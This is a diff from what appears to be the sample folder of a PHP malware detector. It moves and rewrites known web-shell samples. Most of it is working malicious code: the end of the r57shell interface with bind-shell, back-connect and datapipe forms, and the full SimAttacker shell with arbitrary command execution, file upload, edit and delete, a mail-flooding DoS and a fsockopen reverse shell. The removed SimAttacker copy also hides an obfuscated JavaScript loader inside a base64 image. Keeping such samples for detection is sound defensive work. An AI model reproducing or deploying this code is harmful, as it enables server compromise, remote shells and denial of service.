+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>
+
+
+</body></html>";
+
+
 ?>
\ No newline at end of file
diff --git a/php-malware-finder/samples/classic/simattacker.php b/data/samples/classic/simattacker.php
index 79b49d0..7e6f057 100644
--- a/php-malware-finder/samples/classic/simattacker.php
+++ b/data/samples/classic/simattacker.php
@@ -1,756 +1,756 @@
-<?

-

-//download Files  Code

-

-$fdownload=$_GET['fdownload'];

-

-if ($fdownload <> "" ){

-

-// path & file name

-

-$path_parts = pathinfo("$fdownload");

-

-$entrypath=$path_parts["basename"];

-

-$name = "$fdownload";

-

-$fp = fopen($name, 'rb');

-

-header("Content-Disposition: attachment; filename=$entrypath");

-

-header("Content-Length: " . filesize($name));

-

-fpassthru($fp);

-

-exit;

-

-}

-

-?>

-

-        

-

-<html>

-

-

-

-<head>

-

-<meta http-equiv="Content-Language" content="en-us">

-

-<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

-

-<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>

-<style>

-

-<!--

-

-body         { font-family: Tahoma; font-size: 8pt }

-

--->

-

-</style>

-

-</head>

-

-<body>

-

-<?

-

-error_reporting(E_ERROR | E_WARNING | E_PARSE);

-

-

-

- //File Edit

-

- $fedit=$_GET['fedit'];

-

- if ($fedit <> "" ){

-

- $fedit=realpath($fedit);

-

- $lines = file($fedit);

-

- echo "<form action='' method='POST'>";

-

-echo "<textarea name='savefile' rows=30 cols=80>" ;

-

-foreach ($lines as $line_num => $line) {

-

- echo htmlspecialchars($line);

-

-}

-

-echo "</textarea>

-

-        <input type='text' name='filepath'  size='60' value='$fedit'>

-

-        <input type='submit' value='save'></form>";

-

-        $savefile=$_POST['savefile'];

-

-        $filepath=realpath($_POST['filepath']);

-

-        if ($savefile <> "") 

-

-        {

-

-        $fp=fopen("$filepath","w+");

-

-        fwrite ($fp,"") ;

-

-        fwrite ($fp,$savefile) ;

-

-        fclose($fp);

-

-        echo "<script language='javascript'> close()</script>";

-

-        }

-

-exit();

-

- }

-

-?>

-

-<?

-

-// CHmod - PRimission

-

-$fchmod=$_GET['fchmod'];

-

-if ($fchmod <> "" ){

-

-$fchmod=realpath($fchmod);

-

-echo "<center><br>

-

-chmod for :$fchmod<br>

-

-<form method='POST' action=''><br>

-

-Chmod :<br>

-

-<input type='text' name='chmod0' ><br>

-

-<input type='submit' value='change chmod'>

-

-</form>";

-

-$chmod0=$_POST['chmod0'];

-

-if ($chmod0 <> ""){

-

-chmod ($fchmod , $chmod0);

-

-}else {

-

-echo "primission Not Allow change Chmod";

-

-}

-

-exit();

-

-}

-

-?>

-

-        

-

-<div align="center">

-

-        <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">

-

-                <tr>

-

-                        <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">

-

-                                <p align="center"><b>

-

-                                <font face="Tahoma" size="2"><br>

-

-                                </font>

-

-                                <font color="#D2D200" face="Tahoma" size="2">

-

-                                <span style="text-decoration: none">

-

-                                <font color="#000000">

-

-                                <a href="?id=fm&dir=<?

-

-        echo getcwd();

-

-        ?>

-

-        ">

-

-                                <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>

-

-                                <p align="center"><b><a href="?id=cmd">

-

-                                <span style="text-decoration: none">

-

-                                <font face="Tahoma" size="2" color="#000000">

-

-                                CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>

-

-                                <p align="center"><b><a href="?id=fake-mail">

-

-                                <font face="Tahoma" size="2" color="#000000">

-

-                                <span style="text-decoration: none">Fake mail</span></font></a></b></p>

-

-                                <p align="center"><b>

-

-                                <font face="Tahoma" size="2" color="#000000">

-

-                                <a href="?id=cshell">

-

-                                <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>

-

-                                <p align="center"><b>

-

-                                <font color="#000000" face="Tahoma" size="2">

-

-                                <a href="?id=">

-

-                                <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>

-

-                                <p>&nbsp;<p align="center">&nbsp;</td>

-

-                        <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">

-

-                        <?

-

-                        //*******************************************************

-

-                        //Start Programs About US

-

-                        $id=$_GET['id'];

-

-

-

-                        if ($id=="") {

-

-                        echo "

-

-                        <font face='Arial Black' color='#808080' size='1'>

-

-***************************************************************************<br>

-

-&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>

-

-&nbsp;Programer : Hossein Asgary <br>

-

-&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>

-

-&nbsp;please : If you find bug or problems in program , tell me by : <br>

-

-&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>

-

-Enjoy :) [Only 4 Best Friends ] <br>

-

-***************************************************************************</font></span></p>

-

-";

-

-

-

-echo "<font color='#333333' size='2'>OS :". php_uname();

-

-echo "<br>IP :". 

-

-($_SERVER['REMOTE_ADDR']);

-

-echo "</font>";

-

-

-

-

-

-                        }

-

-                        //************************************************************

-

-                        //cmd-command line

-

-                        $cmd=$_POST['cmd'];

-

-                        if($id=="cmd"){

-

-                $result=shell_exec("$cmd");

-

-                echo "<br><center><h3> CMD ExeCute </h3></center>" ;

-

-                echo "<center>

-

-                <textarea rows=20 cols=70 >$result</textarea><br>

-

-                <form method='POST' action=''>

-

-                <input type='hidden' name='id' value='cmd'>

-

-                <input type='text' size='80' name='cmd' value='$cmd'>

-

-                <input type='submit' value='cmd'><br>";

-

-                        

-

-                        

-

-                        

-

-                        }

-

-                        

-

-                //********************************************************      

-

-                

-

-                //fake mail = Use victim server 4 DOS - fake mail 

-

-                if ( $id=="fake-mail"){

-

-                error_reporting(0);

-

-                echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;

-

-                echo "<center><form method='post' action=''>

-

-                Victim Mail :<br><input type='text' name='to' ><br>

-

-                Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>

-

-                Comments:

-

-                <br>

-

-                <textarea rows='10' cols=50 name='Comments' ></textarea><br>

-

-                <input type='submit' value='Send Mail Strm ' >

-

-                </form></center>";

-

-                //send Storm Mail

-

-                $to=$_POST['to'];

-

-                $nom=$_POST['nom'];

-

-                $Comments=$_POST['Comments'];

-

-                if ($to <> "" ){

-

-                for ($i = 0; $i < $nom ; $i++){

-

-                $from = rand (71,1020000000)."@"."Attacker.com";

-

-                $subject= md5("$from");

-

-        mail($to,$subject,$Comments,"From:$from");

-

-        echo "$i is ok";

-

-        }      

-

-        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";

-

-        }

-

-                }

-

-                //********************************************************

-

-

-

-                        //Connect Back -Firewall Bypass

-

-                        if ($id=="cshell"){

-

-                        echo "<br>Connect back Shell , bypass Firewalls<br>

-

-                        For user :<br>

-

-                        nc -l -p 1019 <br>

-

-                        <hr>

-

-                        <form method='POST' action=''><br>

-

-                        Your IP & BindPort:<br>

-

-                        <input type='text' name='mip' >

-

-                        <input type='text' name='bport' size='5' value='1019'><br>

-

-                        <input type='submit' value='Connect Back'>

-

-                        </form>";

-

-                 $mip=$_POST['mip'];

-

-                 $bport=$_POST['bport'];

-

-                 if ($mip <> "")

-

-                 {

-

-                 $fp=fsockopen($mip , $bport , $errno, $errstr);

-

-                 if (!$fp){

-

-                       $result = "Error: could not open socket connection";

-

-                 }

-

-                 else {

-

-                 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");

-

-          while(!feof($fp)){ 

-

-       fputs ($fp," bash # ");

-

-       $result= fgets ($fp, 4096);

-

-      $message=`$result`;

-

-       fputs ($fp,"--> ".$message."\n");

-

-      }

-

-      fclose ($fp);

-

-                 }

-

-                 }

-

-                        }

-

-                        

-

-                //********************************************************

-

-                        //Spy File Manager

-

-                        $homedir=getcwd();

-

-                        $dir=realpath($_GET['dir'])."/";

-

-                        if ($id=="fm"){

-

-                        echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 

-

-                  &nbsp;<b>

-

-                  <form action='' method='GET'>

-

-                  &nbsp;Path:</b>

-

-                  <input type='hidden' name='id' value='fm'>

-

-                  <input type='text' name='dir' size='80' value='$dir'>

-

-                  <input type='submit' value='dir'>

-

-                  </form>

-

-                 <br>";

-

-

-

-                        echo "

-

-

-

-<div align='center'>

-

-

-

-<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>

-

-        <tr>

-

-                <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>

-

-                <td height='28' width='82' align='center'>

-

-                <font color='#000080' size='2'><b>Size KByte</b></font></td>

-

-                <td height='28' width='83' align='center'>

-

-                <font color='#008000' size='2'><b>Download</b></font></td>

-

-                <td height='28' width='66' align='center'>

-

-                <font color='#FF9933' size='2'><b>Edit</b></font></td>

-

-                <td height='28' width='75' align='center'>

-

-                <font color='#999999' size='2'><b>Chmod</b></font></td>

-

-                <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>

-

-        </tr>";

-

-                    if (is_dir($dir)){

-

-                    if ($dh=opendir($dir)){

-

-                    while (($file = readdir($dh)) !== false) {

-

-                    $fsize=round(filesize($dir . $file)/1024);

-

-                

-

-                    

-

-        echo " 

-

-        <tr>

-

-                <th width='250' height='22' align='left' nowrap>";

-

-                if (is_dir($dir.$file))

-

-                {

-

-                echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";

-

-                }

-

-                else {

-

-                echo "<font size='2' color='#666666'>&nbsp;$file ";

-

-                }

-

-                echo "</a></font></th>

-

-                <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";

-

-                if (is_file($dir.$file))

-

-                {

-

-                echo "$fsize";

-

-                }

-

-                else {

-

-                echo "&nbsp; ";

-

-                }

-

-                echo "

-

-                </b></font></td>

-

-                <td width='103' align='center' nowrap>";

-

-                if (is_file($dir.$file)){

-

-                if (is_readable($dir.$file)){

-

-                echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";

-

-                }else {

-

-                echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";

-

-                 }

-

-                }else {

-

-                echo "&nbsp;";

-

-                 }

-

-                echo "

-

-                </a></font></td>

-

-                <td width='77' align='center' nowrap>";

-

-                if (is_file($dir.$file))

-

-                {

-

-                if (is_readable($dir.$file)){

-

-                echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";

-

-                }else {

-

-                echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";

-

-                 }

-

-                }else {

-

-                echo "&nbsp;";

-

-                 }

-

-                echo "

-

-                </a></font></td>

-

-                <td width='86' align='center' nowrap>";

-

-                if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {

-

-                echo "<font size='1' color='#999999'>Dont in windows";

-

-                }

-

-                else {

-

-                echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";

-

-                }

-

-                echo "</a></font></td>

-

-                <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>

-

-        </tr>

-

-        ";

-

-                      }

-

-                      closedir($dh);

-

-                    } 

-

-                    }

-

-                    echo "</table>

-

-<form enctype='multipart/form-data' action='' method='POST'>

-

- <input type='hidden' name='MAX_FILE_SIZE' value='300000' />

-

- Send this file: <input name='userfile' type='file' />

-

- <inpt type='hidden' name='Fupath'  value='$dir'>

-

- <input type='submit' value='Send File' />

-

-</form> 

-

-                    </div>";

-

-                        }

-

-//Upload Files 

-

-$rpath=$_GET['dir'];

-

-if ($rpath <> "") {

-

-$uploadfile = $rpath."/" . $_FILES['userfile']['name'];

-

-print "<pre>";

-

-if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {

-

-echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";

-

-echo "<script language='javascript'> history.back(2)</script>";

-

-}

-

- }

-

- //file deleted

-

-$frpath=$_GET['fdelete'];

-

-if ($frpath <> "") {

-

-if (is_dir($frpath)){

-

-$matches = glob($frpath . '/*.*');

-

-if ( is_array ( $matches ) ) {

-

-  foreach ( $matches as $filename) {

-

-  unlink ($filename);

-

-  rmdir("$frpath");

-

-echo "<script language='javascript'> alert('Success! Please refresh')</script>";

-

-echo "<script language='javascript'> history.back(1)</script>";

-

-  }

-

-  }

-

-  }

-

-  else{

-

-echo "<script language='javascript'> alert('Success! Please refresh')</script>";

-

-unlink ("$frpath");

-

-echo "<script language='javascript'> history.back(1)</script>";

-

-exit(0);

-

-

-

-  }

-

-  

-

-

-

-}

-

-                        ?>

-

-                        

-

-                        </td>

-

-                </tr>

-

-                <tr>

-

-                        <td style="border: 1px dotted #FFCC66">

-

-                        <p align="center"><font color="#666666" size="1" face="Tahoma"><br>

-

-                        Copyright 2004-Simorgh Security<br>

-

-                        Hossein-Asgari<br>

-

-                        </font><font color="#c0c0c0" size="1" face="Tahoma">

-

-                <a style="TEXT-DECORATION: none" href="http://www.r57.biz">

-

-                <font color="#666666">www.r57.biz</font></a></font></td>

-                

-                </tr>

-

-        </table>

-<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(4);}, 500);

-</script>

-</div>

-

-</body>

-

-

-

-</html>

+<?
+
+//download Files  Code
+
+$fdownload=$_GET['fdownload'];
+
+if ($fdownload <> "" ){
+
+// path & file name
+
+$path_parts = pathinfo("$fdownload");
+
+$entrypath=$path_parts["basename"];
+
+$name = "$fdownload";
+
+$fp = fopen($name, 'rb');
+
+header("Content-Disposition: attachment; filename=$entrypath");
+
+header("Content-Length: " . filesize($name));
+
+fpassthru($fp);
+
+exit;
+
+}
+
+?>
+
+        
+
+<html>
+
+
+
+<head>
+
+<meta http-equiv="Content-Language" content="en-us">
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+
+<!--
+
+body         { font-family: Tahoma; font-size: 8pt }
+
+-->
+
+</style>
+
+</head>
+
+<body>
+
+<?
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+
+
+ //File Edit
+
+ $fedit=$_GET['fedit'];
+
+ if ($fedit <> "" ){
+
+ $fedit=realpath($fedit);
+
+ $lines = file($fedit);
+
+ echo "<form action='' method='POST'>";
+
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+
+foreach ($lines as $line_num => $line) {
+
+ echo htmlspecialchars($line);
+
+}
+
+echo "</textarea>
+
+        <input type='text' name='filepath'  size='60' value='$fedit'>
+
+        <input type='submit' value='save'></form>";
+
+        $savefile=$_POST['savefile'];
+
+        $filepath=realpath($_POST['filepath']);
+
+        if ($savefile <> "") 
+
+        {
+
+        $fp=fopen("$filepath","w+");
+
+        fwrite ($fp,"") ;
+
+        fwrite ($fp,$savefile) ;
+
+        fclose($fp);
+
+        echo "<script language='javascript'> close()</script>";
+
+        }
+
+exit();
+
+ }
+
+?>
+
+<?
+
+// CHmod - PRimission
+
+$fchmod=$_GET['fchmod'];
+
+if ($fchmod <> "" ){
+
+$fchmod=realpath($fchmod);
+
+echo "<center><br>
+
+chmod for :$fchmod<br>
+
+<form method='POST' action=''><br>
+
+Chmod :<br>
+
+<input type='text' name='chmod0' ><br>
+
+<input type='submit' value='change chmod'>
+
+</form>";
+
+$chmod0=$_POST['chmod0'];
+
+if ($chmod0 <> ""){
+
+chmod ($fchmod , $chmod0);
+
+}else {
+
+echo "primission Not Allow change Chmod";
+
+}
+
+exit();
+
+}
+
+?>
+
+        
+
+<div align="center">
+
+        <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+
+                <tr>
+
+                        <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+
+                                <p align="center"><b>
+
+                                <font face="Tahoma" size="2"><br>
+
+                                </font>
+
+                                <font color="#D2D200" face="Tahoma" size="2">
+
+                                <span style="text-decoration: none">
+
+                                <font color="#000000">
+
+                                <a href="?id=fm&dir=<?
+
+        echo getcwd();
+
+        ?>
+
+        ">
+
+                                <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+
+                                <p align="center"><b><a href="?id=cmd">
+
+                                <span style="text-decoration: none">
+
+                                <font face="Tahoma" size="2" color="#000000">
+
+                                CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+
+                                <p align="center"><b><a href="?id=fake-mail">
+
+                                <font face="Tahoma" size="2" color="#000000">
+
+                                <span style="text-decoration: none">Fake mail</span></font></a></b></p>
+
+                                <p align="center"><b>
+
+                                <font face="Tahoma" size="2" color="#000000">
+
+                                <a href="?id=cshell">
+
+                                <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+
+                                <p align="center"><b>
+
+                                <font color="#000000" face="Tahoma" size="2">
+
+                                <a href="?id=">
+
+                                <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+
+                                <p>&nbsp;<p align="center">&nbsp;</td>
+
